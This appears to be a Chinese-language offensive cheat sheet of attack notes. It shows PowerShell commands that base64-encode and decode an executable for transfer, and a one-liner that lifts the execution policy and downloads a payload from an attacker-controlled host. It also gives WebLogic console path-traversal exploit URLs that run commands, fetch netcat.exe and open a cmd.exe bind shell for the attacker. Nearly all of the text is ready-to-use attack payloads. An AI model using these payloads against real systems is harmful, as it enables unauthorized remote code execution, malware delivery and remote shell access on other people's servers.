将exe先作base64加密,通过cmd上传后解密输出 对exe作base64加密的方法: (1)powershell $PEBytes = [System.IO.File]::ReadAllBytes(“C:\windows\system32\calc.exe”) $Base64Payload = [System.Convert]::ToBase64String($PEBytes) Set-Content base64.txt -Value $Base64Payload 运行后会将C:\windows\system32\calc.exe作base64加密并输出到base64.txt 解密base64文件并生成exe的方法: (1)powershell $Base64Bytes = Get-Content base64.txt $PEBytes= [System.Convert]::FromBase64String($Base64Bytes) Set-Content calc.exe -Value $PEBytes
远程文件下载: powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser;(new-object System.Net.WebClient).DownloadFile(‘http://192.168.1.157:8000/1.txt’,’3.exe’) 注意:powershell单引号与双引号的区别,上面只能用单引号;如果远程漏洞是java环境,那么单引号需要转义,形如 cmd /c powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser;(new-object System.Net.WebClient).DownloadFile('http://192.168.1.157:8000/1.txt','3.exe')
weblogic中 命令执行:http://192.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22) (1) 绕过:http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal
下载netcat.exe,http://192.168.1.110:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27cmd%20/c%20powershell%20Set-ExecutionPolicy%20Unrestricted%20-Scope%20CurrentUser;(new-object%20System.Net.WebClient).DownloadFile(%5C’http://192.168.1.157:8000/netcat/nc.exe%5C’,%5C’netcat.exe%5C’)%27);%22) (2) 反弹 Victim:cmd /c netcat.exe -lvp 9999 -e cmd.exe
Attacker:nc 192.168.1.110 9999
http://192.168.1.110:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27cmd%20/c%20netcat.exe%20-lvp%209988%20-e%20cmd.exe%27);%22)
kali:nc 192.168.1.110 9999